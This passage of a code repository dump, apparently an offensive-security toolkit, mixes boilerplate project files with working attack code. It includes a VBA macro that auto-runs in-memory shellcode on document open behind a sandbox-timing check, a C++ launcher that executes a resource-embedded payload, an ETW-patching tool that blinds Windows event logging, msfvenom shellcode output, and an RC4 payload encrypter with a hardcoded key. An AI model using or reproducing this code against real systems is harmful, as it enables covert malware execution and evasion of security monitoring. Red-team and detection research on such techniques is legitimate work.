20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("9256a08b-3fe0-4746-b6ee-050183c4eafe")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass/PSLangBypass/PSLangBypass_SpawnShell/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PSLangBypass_SpawnShell")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PSLangBypass_SpawnShell")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("9c213991-b733-4907-be3f-03d8317ade11")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/DLL_Shellcode_Runner_Caesar_ExNuma/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DLL_Shellcode_Runner_Caesar_ExNuma")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DLL_Shellcode_Runner_Caesar_ExNuma")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("33dde983-b924-4bb1-8c54-82d57fe06bf9")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/PS_Reflective_DLLInject_ExNuma_XOR/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PS_Reflective_DLLInject_ExNuma_XOR")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PS_Reflective_DLLInject_ExNuma_XOR")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("8d6f149b-b396-4633-9ac6-28dc37ee0a14")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/VisualBasic/vba_macro_inmeminj_timer.vb:
--------------------------------------------------------------------------------
1 | Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
2 | Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
3 | Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
4 | Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long
5 |
6 | Function mymacro()
7 | Dim buf As Variant
8 | Dim addr As LongPtr
9 | Dim counter As Long
10 | Dim data As Long
11 | 'Dim res As LongPtr
12 | Dim t1 As Date
13 | Dim t2 As Date
14 | Dim time As Long
15 |
16 | t1 = Now()
17 | Sleep (2000)
18 | t2 = Now()
19 | time = DateDiff("s", t1, t2)
20 |
21 | If time < 2 Then
22 | Exit Function
23 | End If
24 |
25 | buf = Array()
26 |
27 | For i = 0 To UBound(buf)
28 | buf(i) = buf(i) - 2
29 | Next i
30 |
31 | addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
32 | For counter = LBound(buf) To UBound(buf)
33 | data = buf(counter)
34 | res = RtlMoveMemory(addr + counter, data, 1)
35 | Next counter
36 |
37 | res = CreateThread(0, 0, addr, 0, 0, 0)
38 | End Function
39 |
40 | Sub Document_Open()
41 | mymacro
42 | End Sub
43 |
44 | Sub AutoOpen()
45 | mymacro
46 | End Sub
47 |
--------------------------------------------------------------------------------
/C++/RC4_SysFunc032_Encrypter/RC4_SysFunc032_Encrypter.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 | Header Files
28 |
29 |
30 |
31 |
32 | Resource Files
33 |
34 |
35 |
36 |
37 | Resource Files
38 |
39 |
40 |
--------------------------------------------------------------------------------
/C++/Shellcode_Launcher/Shellcode_Launcher.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include "resource.h"
4 |
5 | int main()
6 | {
7 | unsigned char* shellcode;
8 | SIZE_T scSize;
9 |
10 | // Generate a resource.rc & resource.h poiting to a file of binary (raw) type shellcode
11 | // .rsrc storage && .rsrc payload extraction
12 | HRSRC res = FindResourceW(NULL, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA);
13 | HGLOBAL resHandle = LoadResource(NULL, res);
14 | shellcode = (unsigned char*)LockResource(resHandle);
15 | scSize = SizeofResource(NULL, res);
16 |
17 | //SIZE_T scSize = sizeof(shellcode);
18 |
19 | PVOID vAlloc = VirtualAlloc(0, scSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
20 | printf("[*] Mem: %p\n", vAlloc);
21 |
22 | if (!memmove(vAlloc, shellcode, scSize))
23 | {
24 | printf("RtlMoveMemory Failed: %d\n", GetLastError());
25 | return -1;
26 | };
27 |
28 |
29 | DWORD lpflOldProtect;
30 | if (!VirtualProtect(vAlloc, scSize, PAGE_EXECUTE_READ, &lpflOldProtect)) {
31 | printf("VirtualProtect Failed: %d\n", GetLastError());
32 | return -1;
33 | }
34 |
35 |
36 | HANDLE cThread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)vAlloc, 0, 0, 0);
37 | if (!cThread) {
38 | printf("CreateThread Failed: %d\n", GetLastError());
39 | return -1;
40 | }
41 |
42 | if (WaitForSingleObject(cThread, INFINITE) == (WAIT_TIMEOUT | WAIT_FAILED)) {
43 | printf("WaitForSingleObject Failed: %d\n", GetLastError());
44 | return -1;
45 | }
46 | CloseHandle(cThread);
47 | return 0;
48 | }
49 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass/PSLangBypass/PSLangBypass_InstallUtil_Bypass/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PSLangBypass_InstallUtil_Bypass")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PSLangBypass_InstallUtil_Bypass")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("9256a08b-3fe0-4746-b6ee-050183c4eafe")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/C++/ServiceShell/messages.h:
--------------------------------------------------------------------------------
1 | // The following are message definitions.
2 | //
3 | // Values are 32 bit values laid out as follows:
4 | //
5 | // 3 3 2 2 2 2 2 2 2 2 2 2 1 1 1 1 1 1 1 1 1 1
6 | // 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0
7 | // +---+-+-+-----------------------+-------------------------------+
8 | // |Sev|C|R| Facility | Code |
9 | // +---+-+-+-----------------------+-------------------------------+
10 | //
11 | // where
12 | //
13 | // Sev - is the severity code
14 | //
15 | // 00 - Success
16 | // 01 - Informational
17 | // 10 - Warning
18 | // 11 - Error
19 | //
20 | // C - is the Customer code flag
21 | //
22 | // R - is a reserved bit
23 | //
24 | // Facility - is the facility code
25 | //
26 | // Code - is the facility's status code
27 | //
28 | //
29 | // Define the facility codes
30 | //
31 | #define FACILITY_SYSTEM 0x0
32 | #define FACILITY_RUNTIME 0x2
33 | #define FACILITY_STUBS 0x3
34 | #define FACILITY_IO_ERROR_CODE 0x4
35 |
36 |
37 | //
38 | // Define the severity codes
39 | //
40 | #define STATUS_SEVERITY_SUCCESS 0x0
41 | #define STATUS_SEVERITY_INFORMATIONAL 0x1
42 | #define STATUS_SEVERITY_WARNING 0x2
43 | #define STATUS_SEVERITY_ERROR 0x3
44 |
45 |
46 | //
47 | // MessageId: SVC_ERROR
48 | //
49 | // MessageText:
50 | //
51 | // An error has occurred (%2).
52 | //
53 | #define SVC_ERROR ((DWORD)0xC0020001L)
54 |
55 | // A message file must end with a period on its own line
56 | // followed by a blank line.
--------------------------------------------------------------------------------
/C++/SysWhispers/SysWhispers.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 | Header Files
34 |
35 |
36 |
37 |
38 | Source Files
39 |
40 |
41 |
--------------------------------------------------------------------------------
/shellcodes/MessageBox/messagebox-64.txt:
--------------------------------------------------------------------------------
1 | $ msfvenom -p windows/x64/messagebox text="Hello World \!" -f c
2 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
3 | [-] No arch selected, selecting arch: x64 from the payload
4 | No encoder specified, outputting raw payload
5 | Payload size: 292 bytes
6 | Final size of c file: 1252 bytes
7 | unsigned char buf[] =
8 | "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41\x51"
9 | "\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x3e\x48"
10 | "\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72\x50\x3e\x48"
11 | "\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02"
12 | "\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e"
13 | "\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88"
14 | "\x00\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b\x48"
15 | "\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48\xff\xc9\x3e"
16 | "\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41"
17 | "\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24"
18 | "\x08\x45\x39\xd1\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0"
19 | "\x66\x3e\x41\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e"
20 | "\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41"
21 | "\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
22 | "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7\xc1"
23 | "\x00\x00\x00\x00\x3e\x48\x8d\x95\xfe\x00\x00\x00\x3e\x4c\x8d"
24 | "\x85\x0c\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83\x56\x07\xff"
25 | "\xd5\x48\x31\xc9\x41\xba\xf0\xb5\xa2\x56\xff\xd5\x48\x65\x6c"
26 | "\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x20\x21\x00\x4d\x65\x73\x73"
27 | "\x61\x67\x65\x42\x6f\x78\x00";
--------------------------------------------------------------------------------
/C++/ETW/ETW-Silencer/ETW-Silencer.cpp:
--------------------------------------------------------------------------------
1 | // ETW-Silencer.cpp : This file contains the 'main' function. Program execution begins and ends there.
2 | //
3 |
4 | #include
5 | #include
6 | #include
7 |
8 | using namespace std;
9 |
10 | FARPROC GetNTAPIAddress(char* NTAPIName) {
11 |
12 | HMODULE hmodule;
13 | FARPROC address;
14 |
15 | hmodule = GetModuleHandleW(L"ntdll.dll");
16 | if (hmodule == NULL) {
17 | return NULL;
18 | exit(EXIT_FAILURE);
19 | }
20 |
21 | address = GetProcAddress(hmodule, NTAPIName);
22 | if (address == NULL) {
23 | return NULL;
24 | exit(EXIT_FAILURE);
25 | }
26 |
27 | return address;
28 | }
29 |
30 | BOOL ETWSilencer() {
31 | LPVOID ETWAddress = GetNTAPIAddress((char*)"EtwEventWrite");
32 |
33 | cout << "[+] EtwEventWrite Address: [ " << ETWAddress << " ]" << endl;
34 | //getchar();
35 |
36 | DWORD oldProtect = 0;
37 | DWORD oldOldProtect = 0;
38 |
39 | const char* ret = "\xc3";
40 |
41 | if (!VirtualProtect(ETWAddress, sizeof ret, PAGE_READWRITE, &oldProtect)) {
42 | return FALSE;
43 | exit(EXIT_FAILURE);
44 | }
45 |
46 | memcpy(ETWAddress, ret, sizeof ret);
47 |
48 | if (!VirtualProtect(ETWAddress, sizeof ret, oldProtect, &oldOldProtect)) {
49 | return FALSE;
50 | exit(EXIT_FAILURE);
51 | }
52 |
53 | return TRUE;
54 | }
55 |
56 | int main()
57 | {
58 | BOOL success = FALSE;
59 |
60 | if (ETWSilencer() == FALSE) {
61 | cout << "[-] Can't silence ETW" << endl;
62 | return EXIT_FAILURE;
63 | }
64 |
65 | cout << "[+] ETW Silenced" << endl;
66 |
67 | return 0;
68 | }
--------------------------------------------------------------------------------
/C++/NT_Shellcoderunner/proto.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include "structs.h"
4 |
5 | // NTAPI Prototypes
6 | typedef NTSTATUS(NTAPI* pfnNtWriteVirtualMemory)(
7 | IN HANDLE ProcessHandle,
8 | IN PVOID BaseAddress,
9 | IN PVOID Buffer,
10 | IN ULONG NumberOfBytesToWrite,
11 | OUT PULONG NumberOfBytesWritten OPTIONAL);
12 |
13 | typedef NTSTATUS(NTAPI* pfnNtAllocateVirtualMemory)(
14 | IN HANDLE ProcessHandle,
15 | IN OUT PVOID* BaseAddress,
16 | IN ULONG ZeroBits,
17 | IN OUT PULONG RegionSize,
18 | IN ULONG AllocationType,
19 | IN ULONG Protect);
20 |
21 | typedef NTSTATUS(NTAPI* pfnNtProtectVirtualMemory)(
22 | IN HANDLE ProcessHandle,
23 | IN OUT PVOID* BaseAddress,
24 | IN OUT PULONG NumberOfBytesToProtect,
25 | IN ULONG NewAccessProtection,
26 | OUT PULONG OldAccessProtection);
27 |
28 | typedef NTSTATUS(NTAPI* pfnRtlCreateUserThread)(
29 | IN HANDLE ProcessHandle,
30 | IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
31 | IN BOOLEAN CreateSuspended,
32 | IN ULONG StackZeroBits,
33 | IN OUT PULONG StackReserved,
34 | IN OUT PULONG StackCommit,
35 | IN PVOID StartAddress,
36 | IN PVOID StartParameter OPTIONAL,
37 | OUT PHANDLE ThreadHandle,
38 | OUT PCLIENT_ID ClientID);
39 |
40 |
41 | typedef NTSTATUS(NTAPI* pfnNtWaitForSingleObject)(
42 | IN HANDLE ObjectHandle,
43 | IN BOOLEAN Alertable,
44 | IN PLARGE_INTEGER TimeOut OPTIONAL);
--------------------------------------------------------------------------------
/C++/API_Hooking/UnHook-Ntdll-Exec/proto.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include "structs.h"
4 |
5 | // NTAPI Prototypes
6 | typedef NTSTATUS(NTAPI* pfnNtWriteVirtualMemory)(
7 | IN HANDLE ProcessHandle,
8 | IN PVOID BaseAddress,
9 | IN PVOID Buffer,
10 | IN ULONG NumberOfBytesToWrite,
11 | OUT PULONG NumberOfBytesWritten OPTIONAL);
12 |
13 | typedef NTSTATUS(NTAPI* pfnNtAllocateVirtualMemory)(
14 | IN HANDLE ProcessHandle,
15 | IN OUT PVOID* BaseAddress,
16 | IN ULONG ZeroBits,
17 | IN OUT PULONG RegionSize,
18 | IN ULONG AllocationType,
19 | IN ULONG Protect);
20 |
21 | typedef NTSTATUS(NTAPI* pfnNtProtectVirtualMemory)(
22 | IN HANDLE ProcessHandle,
23 | IN OUT PVOID* BaseAddress,
24 | IN OUT PULONG NumberOfBytesToProtect,
25 | IN ULONG NewAccessProtection,
26 | OUT PULONG OldAccessProtection);
27 |
28 | typedef NTSTATUS(NTAPI* pfnRtlCreateUserThread)(
29 | IN HANDLE ProcessHandle,
30 | IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
31 | IN BOOLEAN CreateSuspended,
32 | IN ULONG StackZeroBits,
33 | IN OUT PULONG StackReserved,
34 | IN OUT PULONG StackCommit,
35 | IN PVOID StartAddress,
36 | IN PVOID StartParameter OPTIONAL,
37 | OUT PHANDLE ThreadHandle,
38 | OUT PCLIENT_ID ClientID);
39 |
40 |
41 | typedef NTSTATUS(NTAPI* pfnNtWaitForSingleObject)(
42 | IN HANDLE ObjectHandle,
43 | IN BOOLEAN Alertable,
44 | IN PLARGE_INTEGER TimeOut OPTIONAL);
--------------------------------------------------------------------------------
/shellcodes/rc4_encrypt.py:
--------------------------------------------------------------------------------
1 | # https://gist.githubusercontent.com/snovvcrash/3533d950be2d96cf52131e8393794d99/raw/35788127b846c99a72a9fa55b5a5db904764201c/rc4_encrypt.py
2 | #!/usr/bin/env python3
3 |
4 | import sys
5 | from typing import Iterator
6 | from base64 import b64encode
7 |
8 | # Stolen from: https://gist.github.com/hsauers5/491f9dde975f1eaa97103427eda50071
9 | def key_scheduling(key: bytes) -> list[int]:
10 | sched = [i for i in range(0, 256)]
11 |
12 | i = 0
13 | for j in range(0, 256):
14 | i = (i + sched[j] + key[j % len(key)]) % 256
15 | tmp = sched[j]
16 | sched[j] = sched[i]
17 | sched[i] = tmp
18 |
19 | return sched
20 |
21 |
22 | def stream_generation(sched: list[int]) -> Iterator[bytes]:
23 | i, j = 0, 0
24 | while True:
25 | i = (1 + i) % 256
26 | j = (sched[i] + j) % 256
27 | tmp = sched[j]
28 | sched[j] = sched[i]
29 | sched[i] = tmp
30 | yield sched[(sched[i] + sched[j]) % 256]
31 |
32 |
33 | def encrypt(plaintext: bytes, key: bytes) -> bytes:
34 | sched = key_scheduling(key)
35 | key_stream = stream_generation(sched)
36 |
37 | ciphertext = b''
38 | for char in plaintext:
39 | enc = char ^ next(key_stream)
40 | ciphertext += bytes([enc])
41 |
42 | return ciphertext
43 |
44 |
45 | if __name__ == '__main__':
46 |
47 | if len(sys.argv) < 2:
48 | print("Usage: python3 rc4_encrypt.py ")
49 | sys.exit(1)
50 |
51 | _file = sys.argv[1]
52 |
53 | # msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o calc.bin
54 | with open(_file, 'rb') as f:
55 | result = encrypt(plaintext=f.read(), key=b'LK8mT&9o3zShqrc#V2c%tZ^qM#VhQ7DY4QyUxnEQ&6C9zn7i#TD&6j%LTz9QB')
56 |
57 | print(b64encode(result).decode())
--------------------------------------------------------------------------------
/C++/EarlyBird/EarlyBird.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United Kingdom) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENG)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_UK
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // RCDATA
51 | //
52 | IDR_RCDATA1 RCDATA "rcdata1.bin"
53 | #endif // English (United Kingdom) resources
54 | /////////////////////////////////////////////////////////////////////////////
55 |
56 |
57 |
58 | #ifndef APSTUDIO_INVOKED
59 | /////////////////////////////////////////////////////////////////////////////
60 | //
61 | // Generated from the TEXTINCLUDE 3 resource.
62 | //
63 |
64 |
65 | /////////////////////////////////////////////////////////////////////////////
66 | #endif // not APSTUDIO_INVOKED
67 |
68 |
--------------------------------------------------------------------------------
/C++/AES_Process_Injection/AES_Process_Injection.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource1.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United Kingdom) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENG)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_UK
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource1.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 | /////////////////////////////////////////////////////////////////////////////
48 | //
49 | // RCDATA
50 | //
51 | IDR_RCDATA1 RCDATA rcdata1.bin
52 | #endif // English (United Kingdom) resources
53 | /////////////////////////////////////////////////////////////////////////////
54 |
55 |
56 |
57 | #ifndef APSTUDIO_INVOKED
58 | /////////////////////////////////////////////////////////////////////////////
59 | //
60 | // Generated from the TEXTINCLUDE 3 resource.
61 | //
62 |
63 |
64 | /////////////////////////////////////////////////////////////////////////////
65 | #endif // not APSTUDIO_INVOKED
66 |
67 |
--------------------------------------------------------------------------------
/C++/Shellcode_Launcher/Shellcode_Launcher.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United Kingdom) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENG)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_UK
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // RCDATA
51 | //
52 | IDR_RCDATA1 RCDATA "rcdata1.bin"
53 | #endif // English (United Kingdom) resources
54 | /////////////////////////////////////////////////////////////////////////////
55 |
56 |
57 |
58 | #ifndef APSTUDIO_INVOKED
59 | /////////////////////////////////////////////////////////////////////////////
60 | //
61 | // Generated from the TEXTINCLUDE 3 resource.
62 | //
63 |
64 |
65 | /////////////////////////////////////////////////////////////////////////////
66 | #endif // not APSTUDIO_INVOKED
67 |
68 |
--------------------------------------------------------------------------------
/C++/Thread_Context/Thread_Context.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
